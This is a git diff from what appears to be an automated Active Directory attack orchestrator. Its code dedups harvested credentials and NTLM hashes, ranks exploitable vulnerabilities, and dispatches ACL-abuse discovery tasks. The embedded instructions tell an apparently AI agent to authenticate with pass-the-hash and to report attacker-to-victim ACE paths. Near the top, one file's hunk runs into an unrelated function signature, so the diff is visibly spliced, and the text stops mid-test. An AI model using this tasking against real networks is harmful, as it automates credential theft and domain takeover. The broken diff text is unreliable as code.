normalize_state_domains_domain_kept_from_target_domain() { // target_domain should cause that domain to be retained even without hosts/users. 
@@ -1055,3 +1094,118 @@ fn dedup_credentials_normalizes_username_case() { let deduped = dedup_credentials(&creds); assert_eq!(deduped[0].username, "admin"); } + +#[test] +fn is_ghost_machine_account_matches_nopac_pattern() { + use super::is_ghost_machine_account; + assert!(is_ghost_machine_account("WIN-G9FWV8ZNSCL$")); + assert!(is_ghost_machine_account("WIN-4D75DLR6UCC$")); + assert!(is_ghost_machine_account("win-bjak8xunhgd$")); + // without trailing $ + assert!(is_ghost_machine_account("WIN-3KSGCLTS7NX")); +} + +#[test] +fn is_ghost_machine_account_rejects_real_hosts() { + use super::is_ghost_machine_account; + assert!(!is_ghost_machine_account("DC01$")); + assert!(!is_ghost_machine_account("WS01$")); + assert!(!is_ghost_machine_account("WIN-2019$")); // wrong length + assert!(!is_ghost_machine_account("administrator")); + assert!(!is_ghost_machine_account("")); +} + +#[test] +fn sanitize_credentials_drops_ghost_machine_accounts() { + let mut creds = vec![ + make_cred("contoso.local", "WIN-G9FWV8ZNSCL$", "P@ss1"), + make_cred("contoso.local", "jdoe", "P@ss1"), + ]; + sanitize_credentials(&mut creds); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "jdoe"); +} + +#[test] +fn dedup_hashes_collapses_bare_and_prefixed_same_user() { + // Parsers emit the same hash twice when secretsdump output mixes + // `Administrator:RID:...` (bare) and `DOMAIN\Administrator:RID:...` (prefixed) + // — bare gets empty domain, prefixed gets the resolved FQDN. + // The bare row should be folded into the prefixed one. + let hashes = vec![ + make_hash("", "Administrator", "NTLM", "aabbccdd"), + make_hash("contoso.local", "Administrator", "NTLM", "aabbccdd"), + ]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].domain, "contoso.local"); +} + +#[test] +fn dedup_hashes_keeps_distinct_users_sharing_hash() { + // Two different users can end up with identical NTLMs (shared password). + // They must NOT be folded together — dedup keys on + // (username, hash_type, hash_value), not just (hash_type, hash_value). + let hashes = vec![ + make_hash("contoso.local", "Administrator", "NTLM", "deadbeefcafe"), + make_hash("contoso.local", "svc_backup", "NTLM", "deadbeefcafe"), + ]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 2); +} + +#[test] +fn dedup_hashes_bare_with_no_domain_sibling_kept() { + // If we only ever saw the bare form, we cannot infer a domain — keep it as-is. + let hashes = vec![make_hash("", "Administrator", "NTLM", "aabbccdd")]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].domain, ""); +} + +#[test] +fn dedup_hashes_picks_longest_domain_when_multiple_known() { + // If the same user+hash appears with both a parent and a child domain (rare + // cross-forest replication artifact), prefer the longer/more-specific FQDN + // when filling in a bare entry. + let hashes = vec![ + make_hash("", "krbtgt", "NTLM", "deadbeef"), + make_hash("contoso.local", "krbtgt", "NTLM", "deadbeef"), + make_hash("child.contoso.local", "krbtgt", "NTLM", "deadbeef"), + ]; + let deduped = dedup_hashes(&hashes); + // The bare entry folds into the longest sibling; the two populated entries stay distinct. 
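+    // Expected survivors (sketch):
+    //   krbtgt @ contoso.local       : deadbeef
+    //   krbtgt @ child.contoso.local : deadbeef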
+    assert_eq!(deduped.len(), 2);
+    let domains: Vec<&str> = deduped.iter().map(|h| h.domain.as_str()).collect();
+    assert!(domains.contains(&"contoso.local"));
+    assert!(domains.contains(&"child.contoso.local"));
+}
+
+#[test]
+fn dedup_hashes_drops_ghost_machine_accounts() {
+    let hashes = vec![
+        make_hash(
+            "contoso.local",
+            "WIN-4D75DLR6UCC$",
+            "NTLM",
+            "aad3b435b51404eeaad3b435b51404ee:da118ed665879916ceaacfb98e3ee74e",
+        ),
+        make_hash("contoso.local", "admin", "NTLM", "aabb"),
+    ];
+    let deduped = dedup_hashes(&hashes);
+    assert_eq!(deduped.len(), 1);
+    assert_eq!(deduped[0].username, "admin");
+}
+
+#[test]
+fn dedup_users_drops_ghost_machine_accounts() {
+    let nb = HashMap::new();
+    let mut ghost = make_user("contoso.local", "WIN-BJAK8XUNHGD$");
+    ghost.source = "kerberos_enum".to_string();
+    let mut real = make_user("contoso.local", "jdoe");
+    real.source = "kerberos_enum".to_string();
+    let users = vec![ghost, real];
+    let deduped = dedup_users(&users, &nb);
+    assert_eq!(deduped.len(), 1);
+    assert_eq!(deduped[0].username, "jdoe");
+}
diff --git a/ares-cli/src/dedup/users.rs b/ares-cli/src/dedup/users.rs
index c8087de8..9bd4abdc 100644
--- a/ares-cli/src/dedup/users.rs
+++ b/ares-cli/src/dedup/users.rs
@@ -2,7 +2,7 @@ use std::collections::HashMap;
 use ares_core::models::User;
-use super::strip_trailing_dot;
+use super::{is_ghost_machine_account, strip_trailing_dot};
 /// Noise usernames that should be filtered.
 pub(super) const NOISE_USERNAMES: &[&str] = &[
@@ -81,6 +81,7 @@ pub(crate) fn dedup_users(users: &[User], netbios_to_fqdn: &HashMap<String, String>,
    exploited: &HashSet<String>,
@@ -303,20 +308,57 @@ fn print_vulnerabilities(
         return;
     }
-    let mut vulns: Vec<(&String, &VulnerabilityInfo)> = discovered.iter().collect();
-    vulns.sort_by(|a, b| {
-        a.1.priority
-            .cmp(&b.1.priority)
-            .then(a.1.vuln_type.cmp(&b.1.vuln_type))
-    });
+    let mut exploitable: Vec<(&String, &VulnerabilityInfo)> = Vec::new();
+    let mut findings: Vec<(&String, &VulnerabilityInfo)> = Vec::new();
+    for (id, vuln) in discovered.iter() {
+        if vuln.priority <= EXPLOITABLE_PRIORITY_MAX {
+            exploitable.push((id, vuln));
+        } else {
+            findings.push((id, vuln));
+        }
+    }
+    let sort_vulns = |vulns: &mut Vec<(&String, &VulnerabilityInfo)>| {
+        vulns.sort_by(|a, b| {
+            a.1.priority
+                .cmp(&b.1.priority)
+                .then(a.1.vuln_type.cmp(&b.1.vuln_type))
+        });
+    };
+    sort_vulns(&mut exploitable);
+    sort_vulns(&mut findings);
+
+    let exploited_in_exploitable = exploitable
+        .iter()
+        .filter(|(id, _)| exploited.contains(*id))
+        .count();
-    println!("Discovered Vulnerabilities ({}):", vulns.len());
+    println!(
+        "Exploitable Vulnerabilities ({}, {} exploited):",
+        exploitable.len(),
+        exploited_in_exploitable
+    );
+    if exploitable.is_empty() {
+        println!("  (none)");
+    } else {
+        print_vuln_table(&exploitable, exploited);
+    }
+    println!();
+
+    println!("Findings ({}):", findings.len());
+    if !findings.is_empty() {
+        print_vuln_table(&findings, exploited);
+    }
+    println!();
+}
+
+/// Render a single vulnerability table body (header + rows).
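+///
+/// Output sketch (alignment approximate, row values hypothetical):
+///
+/// ```text
+///   Type                           Target               Priority Exploited Details
+///   ------------------------------------------------------------------------------
+///   esc1                           192.168.58.50               1         ✓ template=UserTpl
+/// ```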
+fn print_vuln_table(vulns: &[(&String, &VulnerabilityInfo)], exploited: &HashSet<String>) {
     println!(
         "  {:<30} {:<20} {:>8} {:>9} Details",
         "Type", "Target", "Priority", "Exploited"
     );
     println!("  {}", "-".repeat(100));
-    for (vuln_id, vuln) in &vulns {
+    for (vuln_id, vuln) in vulns {
         let is_exploited = exploited.contains(*vuln_id);
         let exploited_mark = if is_exploited { "\u{2713}" } else { "\u{2717}" };
@@ -336,7 +378,6 @@ fn print_vulnerabilities(
             vuln.vuln_type, vuln.target, vuln.priority, exploited_mark, details_display
         );
     }
-    println!();
 }
 /// Format vulnerability details HashMap into a readable string.
@@ -422,10 +463,12 @@ fn print_attack_path(timeline_events: &[serde_json::Value]) {
             .and_then(|v| v.as_str())
             .unwrap_or("unknown event");
+        let already_critical = description.starts_with("CRITICAL:");
         let desc_lower = description.to_lowercase();
-        let is_critical = desc_lower.contains("krbtgt")
-            || (desc_lower.contains("administrator") && desc_lower.contains("hash"))
-            || desc_lower.contains("domain admin");
+        let is_critical = !already_critical
+            && (desc_lower.contains("krbtgt")
+                || (desc_lower.contains("administrator") && desc_lower.contains("hash"))
+                || desc_lower.contains("domain admin"));
         let prefix = if is_critical { "CRITICAL: " } else { "" };
         let mitre = extract_mitre_from_event(event);
diff --git a/ares-cli/src/orchestrator/automation/acl.rs b/ares-cli/src/orchestrator/automation/acl.rs
index 6571c836..ad710096 100644
--- a/ares-cli/src/orchestrator/automation/acl.rs
+++ b/ares-cli/src/orchestrator/automation/acl.rs
@@ -5,9 +5,9 @@ use std::time::Duration;
 use serde_json::json;
 use tokio::sync::watch;
-use tracing::{info, warn};
+use tracing::{debug, info, warn};
-use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::dispatcher::{Dispatcher, SubmissionOutcome};
 use crate::orchestrator::state::*;
 /// Extract steps from an ACL chain JSON value.
@@ -141,29 +141,45 @@ pub async fn auto_acl_chain_follow(
         });
         let priority = dispatcher.effective_priority("acl_abuse");
-        match dispatcher
-            .throttled_submit("acl_chain_step", "acl", payload, priority)
+        // Mark dedup on Submitted OR Deferred — Deferred means the task is
+        // safely in the deferred ZSET and the drain will retry it. Without
+        // this, the next 30s tick re-emits the same step and the deferred
+        // ZSET hits its per-type cap, silently dropping work.
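+        //
+        // Outcome → action (sketch of the match below):
+        //   Submitted(task_id) → log at info, mark dedup (step is in flight)
+        //   Deferred           → mark dedup (the deferred drain owns the retry)
+        //   Dropped / Err      → leave unmarked so the next tick can retry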
+        let mark_dedup = match dispatcher
+            .throttled_submit_outcome("acl_chain_step", "acl", payload, priority)
             .await
         {
-            Ok(Some(task_id)) => {
+            Ok(SubmissionOutcome::Submitted(task_id)) => {
                 info!(
                     task_id = %task_id,
                     step_key = %dedup_key,
                     "ACL chain step dispatched"
                 );
-                // Mark as dispatched in both in-memory set and dedup
-                {
-                    let mut state = dispatcher.state.write().await;
-                    state.dispatched_acl_steps.insert(dedup_key.clone());
-                    state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone());
-                }
-                let _ = dispatcher
-                    .state
-                    .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key)
-                    .await;
+                true
+            }
+            Ok(SubmissionOutcome::Deferred) => {
+                debug!(step_key = %dedup_key, "ACL chain step deferred (will retry via deferred drain)");
+                true
+            }
+            Ok(SubmissionOutcome::Dropped) => {
+                debug!(step_key = %dedup_key, "ACL chain step dropped (will reconsider next tick)");
+                false
+            }
+            Err(e) => {
+                warn!(err = %e, "Failed to dispatch ACL chain step");
+                false
+            }
+        };
+        if mark_dedup {
+            {
+                let mut state = dispatcher.state.write().await;
+                state.dispatched_acl_steps.insert(dedup_key.clone());
+                state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone());
             }
-            Ok(None) => {} // deferred or throttled
-            Err(e) => warn!(err = %e, "Failed to dispatch ACL chain step"),
+            let _ = dispatcher
+                .state
+                .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key)
+                .await;
         }
     }
 }
@@ -174,6 +190,8 @@ mod tests {
     use super::*;
     use serde_json::json;
+    // --- extract_chain_steps ---
+
     #[test]
     fn extract_chain_steps_from_array() {
         let chain = json!([{"source": "a"}, {"source": "b"}]);
@@ -213,6 +231,8 @@
         assert!(extract_chain_steps(&chain).is_none());
     }
+    // --- extract_source_user ---
+
     #[test]
     fn extract_source_user_from_source_key() {
         let step = json!({"source": "admin"});
@@ -249,6 +269,8 @@
         assert_eq!(extract_source_user(&step), "");
     }
+    // --- extract_source_domain ---
+
     #[test]
     fn extract_source_domain_from_source_domain_key() {
         let step = json!({"source_domain": "contoso.local"});
@@ -279,6 +301,8 @@
         assert_eq!(extract_source_domain(&step), "");
     }
+    // --- acl_step_dedup_key ---
+
     #[test]
     fn acl_step_dedup_key_basic() {
         assert_eq!(acl_step_dedup_key(0, 0), "chain:0:step:0");
diff --git a/ares-cli/src/orchestrator/automation/acl_discovery.rs b/ares-cli/src/orchestrator/automation/acl_discovery.rs
new file mode 100644
index 00000000..7a75814c
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/acl_discovery.rs
@@ -0,0 +1,812 @@
+//! auto_acl_discovery -- discover ACL attack paths via targeted LDAP queries.
+//!
+//! Bridges the gap between BloodHound collection and ACL exploitation.
+//! BloodHound collects data, but the ACL chain analysis must be extracted
+//! and registered as discovered_vulnerabilities for `auto_dacl_abuse` to
+//! exploit.
+//!
+//! This module dispatches `ldap_acl_enumeration` tasks per domain to:
+//! 1. Query nTSecurityDescriptor on user/group/computer objects
+//! 2. Identify dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword,
+//!    GenericWrite, WriteOwner, Self-Membership)
+//! 3. Register discovered ACL paths as vulnerabilities
+//!
+//! Interval: 30s ticks after an initial 45s recon delay (heavy LDAP query;
+//! per-domain dedup keys keep re-dispatch in check).

+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// The dangerous ACE types we want the recon agent to identify.
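+///
+/// Rough abuse primitive per ACE (standard BloodHound semantics, noted for
+/// orientation — not taken from this change): GenericAll → full control;
+/// GenericWrite/WriteProperty → targeted attribute writes (e.g. SPN for a
+/// targeted Kerberoast); WriteDacl → grant yourself rights; WriteOwner →
+/// take ownership first; ForceChangePassword → reset the victim's password;
+/// Self-Membership/WriteMember → add yourself to the group;
+/// AllExtendedRights → extended-rights bundle (includes password reset).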
+const DANGEROUS_ACE_TYPES: &[&str] = &[
+    "GenericAll",
+    "GenericWrite",
+    "WriteDacl",
+    "WriteOwner",
+    "ForceChangePassword",
+    "Self-Membership",
+    "WriteMember",
+    "AllExtendedRights",
+    "WriteProperty",
+];
+
+/// Collect ACL discovery work items from current state.
+///
+/// Pure logic extracted from `auto_acl_discovery` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_acl_discovery_work(state: &StateInner) -> Vec<AclDiscoveryWork> {
+    if state.credentials.is_empty() && state.hashes.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for (domain, dc_ip) in &state.all_domains_with_dcs() {
+        // Skip dominated domains — once we own a domain there is nothing left
+        // for ACL escalation to discover there. Cross-trust ACL paths against
+        // un-owned domains still fire (they iterate other entries in
+        // all_domains_with_dcs).
+        if state.dominated_domains.contains(domain) {
+            continue;
+        }
+        // Use separate dedup keys for cred vs hash attempts so a failed
+        // password-based attempt (e.g., mislabeled credential domain)
+        // doesn't permanently block the hash-based path.
+        let dedup_key_cred = format!("acl_disc:{}:cred", domain.to_lowercase());
+        let dedup_key_hash = format!("acl_disc:{}:hash", domain.to_lowercase());
+        let dedup_key_trust = format!("acl_disc:{}:trust", domain.to_lowercase());
+
+        // Prefer same-domain cleartext cred, then fall back to trust-compatible
+        // cred (child→parent or cross-forest). Trust-based attempts use a
+        // separate dedup key so they don't block hash-based fallback.
+        let (cred, using_trust_cred) = if !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_cred)
+        {
+            let c = state
+                .credentials
+                .iter()
+                .find(|c| {
+                    !c.password.is_empty()
+                        && c.domain.to_lowercase() == domain.to_lowercase()
+                        && !state.is_credential_quarantined(&c.username, &c.domain)
+                })
+                .cloned();
+            (c, false)
+        } else {
+            (None, false)
+        };
+        let (cred, using_trust_cred) =
+            if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_trust) {
+                match state.find_trust_credential(domain) {
+                    Some(c) => (Some(c), true),
+                    None => (None, using_trust_cred),
+                }
+            } else {
+                (cred, using_trust_cred)
+            };
+
+        // Look for NTLM hash (PTH) — fires independently of cred attempt
+        let (ntlm_hash, ntlm_hash_username) =
+            if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_hash) {
+                state
+                    .hashes
+                    .iter()
+                    .find(|h| {
+                        h.hash_type.to_lowercase() == "ntlm"
+                            && h.domain.to_lowercase() == domain.to_lowercase()
+                            && h.username.to_lowercase() == "administrator"
+                    })
+                    .or_else(|| {
+                        state.hashes.iter().find(|h| {
+                            h.hash_type.to_lowercase() == "ntlm"
+                                && h.domain.to_lowercase() == domain.to_lowercase()
+                                && !state.is_delegation_account(&h.username)
+                        })
+                    })
+                    .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone())))
+                    .unwrap_or((None, None))
+            } else {
+                (None, None)
+            };
+
+        // Need at least a credential or an NTLM hash
+        if cred.is_none() && ntlm_hash.is_none() {
+            continue;
+        }
+
+        let dedup_key = if ntlm_hash.is_some() {
+            dedup_key_hash
+        } else if using_trust_cred {
+            dedup_key_trust
+        } else {
+            dedup_key_cred
+        };
+
+        // Collect known users in this domain to check ACEs against.
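+        // (Sourced from state.credentials only — i.e. principals we can
+        // actually act as — matching the payload instruction to focus on
+        // ACEs whose source is a user we hold credentials for.)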
+        let domain_users: Vec<String> = state
+            .credentials
+            .iter()
+            .filter(|c| c.domain.to_lowercase() == domain.to_lowercase())
+            .map(|c| c.username.clone())
+            .collect();
+
+        items.push(AclDiscoveryWork {
+            dedup_key,
+            domain: domain.clone(),
+            dc_ip: dc_ip.clone(),
+            credential: cred.unwrap_or_else(|| ares_core::models::Credential {
+                id: String::new(),
+                username: ntlm_hash_username.clone().unwrap_or_default(),
+                password: String::new(),
+                domain: domain.clone(),
+                source: "hash_fallback".into(),
+                is_admin: false,
+                discovered_at: None,
+                parent_id: None,
+                attack_step: 0,
+            }),
+            known_users: domain_users,
+            ntlm_hash,
+            ntlm_hash_username,
+        });
+    }
+
+    items
+}
+
+/// Dispatches LDAP ACE enumeration per domain to discover ACL attack paths.
+/// Waits 45s after spawn for initial recon (BloodHound collection) to populate
+/// domain controllers before the first tick, avoiding duplicated effort.
+pub async fn auto_acl_discovery(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(30));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    info!("auto_acl_discovery: spawned, waiting 45s for initial recon");
+
+    // Wait for initial recon to populate domain controllers.
+    tokio::time::sleep(Duration::from_secs(45)).await;
+
+    info!("auto_acl_discovery: initial wait complete, entering main loop");
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("acl_discovery") {
+            debug!("auto_acl_discovery: technique not allowed");
+            continue;
+        }
+
+        let work: Vec<AclDiscoveryWork> = {
+            let state = dispatcher.state.read().await;
+            let dcs = state.all_domains_with_dcs();
+            let creds = state.credentials.len();
+            let hashes = state.hashes.len();
+            info!(
+                dc_count = dcs.len(),
+                creds, hashes, "auto_acl_discovery: tick"
+            );
+            collect_acl_discovery_work(&state)
+        };
+
+        if work.is_empty() {
+            debug!("auto_acl_discovery: no work items");
+        } else {
+            info!(
+                count = work.len(),
+                "auto_acl_discovery: work items collected"
+            );
+        }
+
+        for item in work {
+            // When PTH hash is available, use the hash user's identity for the target domain
+            let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() {
+                (
+                    item.ntlm_hash_username
+                        .clone()
+                        .unwrap_or_else(|| item.credential.username.clone()),
+                    String::new(),
+                    item.domain.clone(),
+                )
+            } else {
+                (
+                    item.credential.username.clone(),
+                    item.credential.password.clone(),
+                    item.credential.domain.clone(),
+                )
+            };
+            let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase();
+            let mut payload = json!({
+                "technique": "ldap_acl_enumeration",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "credential": {
+                    "username": cred_user,
+                    "password": cred_pass,
+                    "domain": cred_domain,
+                },
+                "ace_types": DANGEROUS_ACE_TYPES,
+                "known_users": item.known_users,
+                "instructions": concat!(
+                    "Enumerate ACL attack paths in this domain.\n\n",
+                    "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ",
+                    "you MUST use pass-the-hash. Do NOT attempt LDAP simple bind with empty password.\n",
+                    " - Use ldap_search with the hash if it accepts one, OR\n",
+                    " - Use rpcclient_command with the hash parameter to query DACLs via RPC.\n\n",
+                    "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain, ",
+                    "you MUST pass bind_domain= to ldap_search. 
", + "Check the 'bind_domain' field in the task payload — if present, always pass it ", + "to ldap_search so the LDAP bind uses user@bind_domain.\n\n", + "If a password IS provided, use ldap_search with filter ", + "'(objectCategory=*)' and request the nTSecurityDescriptor attribute.\n\n", + "For each dangerous ACE found (GenericAll, WriteDacl, ForceChangePassword, ", + "GenericWrite, WriteOwner, Self-Membership on users/groups), register it as ", + "a vulnerability with EXACTLY these fields:\n", + " vuln_type: lowercase ACE type (e.g. 'forcechangepassword', 'genericall', ", + "'genericwrite', 'writedacl', 'writeowner', 'self_membership')\n", + " source: the user/group that HAS the permission (attacker)\n", + " target: the user/group/computer that is the TARGET (victim)\n", + " target_type: 'User', 'Group', or 'Computer'\n", + " domain: the domain where this ACE exists\n", + " source_domain: the domain of the source principal\n", + "Focus on ACEs where the source is a user we have credentials for.\n\n", + "IMPORTANT: Include ALL users discovered in the discovered_users array:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"acl_discovery\"}" + ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + if let Some(ref hash) = item.ntlm_hash { + payload["ntlm_hash"] = json!(hash); + } + if let Some(ref user) = item.ntlm_hash_username { + payload["hash_username"] = json!(user); + } + + // ACL discovery is high-priority — it gates RBCD, shadow creds, + // and DACL abuse exploitation paths. Use priority 2 to compete + // with credential_access tasks rather than sitting behind them. + let priority = 2; + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + known_users = item.known_users.len(), + "ACL discovery dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ACL_DISCOVERY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ACL_DISCOVERY, &item.dedup_key) + .await; + } + Ok(None) => { + // Don't mark dedup on defer — the deferred queue will + // retry and we need the work item to remain eligible in + // case the deferred task never dispatches. Duplicate + // enqueues to the deferred queue are harmless (it dedupes + // by payload hash). 
+                    debug!(domain = %item.domain, "ACL discovery deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, domain = %item.domain, "Failed to dispatch ACL discovery");
+                }
+            }
+        }
+    }
+}
+
+struct AclDiscoveryWork {
+    dedup_key: String,
+    domain: String,
+    dc_ip: String,
+    credential: ares_core::models::Credential,
+    known_users: Vec<String>,
+    ntlm_hash: Option<String>,
+    ntlm_hash_username: Option<String>,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::orchestrator::state::StateInner;
+    use ares_core::models::Credential;
+
+    fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+        Credential {
+            id: format!("c-{username}"),
+            username: username.into(),
+            password: password.into(), // pragma: allowlist secret
+            domain: domain.into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        }
+    }
+
+    #[test]
+    fn dedup_key_format() {
+        let key_cred = format!("acl_disc:{}:cred", "contoso.local");
+        let key_hash = format!("acl_disc:{}:hash", "contoso.local");
+        assert_eq!(key_cred, "acl_disc:contoso.local:cred");
+        assert_eq!(key_hash, "acl_disc:contoso.local:hash");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_ACL_DISCOVERY, "acl_discovery");
+    }
+
+    #[test]
+    fn dangerous_ace_types_not_empty() {
+        assert!(!DANGEROUS_ACE_TYPES.is_empty());
+    }
+
+    #[test]
+    fn dangerous_ace_types_contains_key_types() {
+        assert!(DANGEROUS_ACE_TYPES.contains(&"GenericAll"));
+        assert!(DANGEROUS_ACE_TYPES.contains(&"WriteDacl"));
+        assert!(DANGEROUS_ACE_TYPES.contains(&"ForceChangePassword"));
+        assert!(DANGEROUS_ACE_TYPES.contains(&"GenericWrite"));
+        assert!(DANGEROUS_ACE_TYPES.contains(&"WriteOwner"));
+        assert!(DANGEROUS_ACE_TYPES.contains(&"Self-Membership"));
+    }
+
+    #[test]
+    fn dangerous_ace_types_count() {
+        assert_eq!(DANGEROUS_ACE_TYPES.len(), 9);
+    }
+
+    #[test]
+    fn dangerous_ace_types_includes_write_property() {
+        assert!(DANGEROUS_ACE_TYPES.contains(&"WriteProperty"));
+        assert!(DANGEROUS_ACE_TYPES.contains(&"AllExtendedRights"));
+        assert!(DANGEROUS_ACE_TYPES.contains(&"WriteMember"));
+    }
+
+    #[test]
+    fn dangerous_ace_types_no_duplicates() {
+        let mut seen = std::collections::HashSet::new();
+        for ace in DANGEROUS_ACE_TYPES {
+            assert!(seen.insert(*ace), "Duplicate ACE type: {ace}");
+        }
+    }
+
+    #[test]
+    fn dedup_key_case_normalized() {
+        let key1 = format!("acl_disc:{}", "CONTOSO.LOCAL".to_lowercase());
+        let key2 = format!("acl_disc:{}", "contoso.local");
+        assert_eq!(key1, key2);
+    }
+
+    #[test]
+    fn acl_discovery_payload_structure() {
+        let payload = serde_json::json!({
+            "technique": "ldap_acl_enumeration",
+            "target_ip": "192.168.58.10",
+            "domain": "contoso.local",
+            "credential": {
+                "username": "admin",
+                "password": "P@ssw0rd!",
+                "domain": "contoso.local",
+            },
+            "ace_types": DANGEROUS_ACE_TYPES,
+            "known_users": ["admin", "jdoe"],
+        });
+        assert_eq!(payload["technique"], "ldap_acl_enumeration");
+        assert_eq!(payload["target_ip"], "192.168.58.10");
+        let ace_types = payload["ace_types"].as_array().unwrap();
+        assert_eq!(ace_types.len(), 9);
+    }
+
+    #[test]
+    fn credential_domain_preference() {
+        // Same-domain credential is preferred
+        let domain = "contoso.local";
+        let cred_same = "contoso.local";
+        let cred_other = "fabrikam.local";
+        assert_eq!(cred_same.to_lowercase(), domain.to_lowercase());
+        assert_ne!(cred_other.to_lowercase(), domain.to_lowercase());
+    }
+
+    #[test]
+    fn known_users_collection() {
+        let credentials = [
+            ("admin", "contoso.local"),
+            ("jdoe", "contoso.local"),
+            ("admin",
"fabrikam.local"), + ]; + let domain = "contoso.local"; + let domain_users: Vec<&str> = credentials + .iter() + .filter(|(_, d)| d.to_lowercase() == domain.to_lowercase()) + .map(|(u, _)| *u) + .collect(); + assert_eq!(domain_users.len(), 2); + assert!(domain_users.contains(&"admin")); + assert!(domain_users.contains(&"jdoe")); + } + + #[test] + fn acl_discovery_work_fields() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = AclDiscoveryWork { + dedup_key: "acl_disc:contoso.local:cred".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + known_users: vec!["admin".into(), "jdoe".into()], + ntlm_hash: None, + ntlm_hash_username: None, + }; + assert_eq!(work.known_users.len(), 2); + assert_eq!(work.domain, "contoso.local"); + } + + // --- collect_acl_discovery_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + assert!(work[0].known_users.contains(&"admin".to_string())); + } + + #[test] + fn collect_multiple_domains_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + 
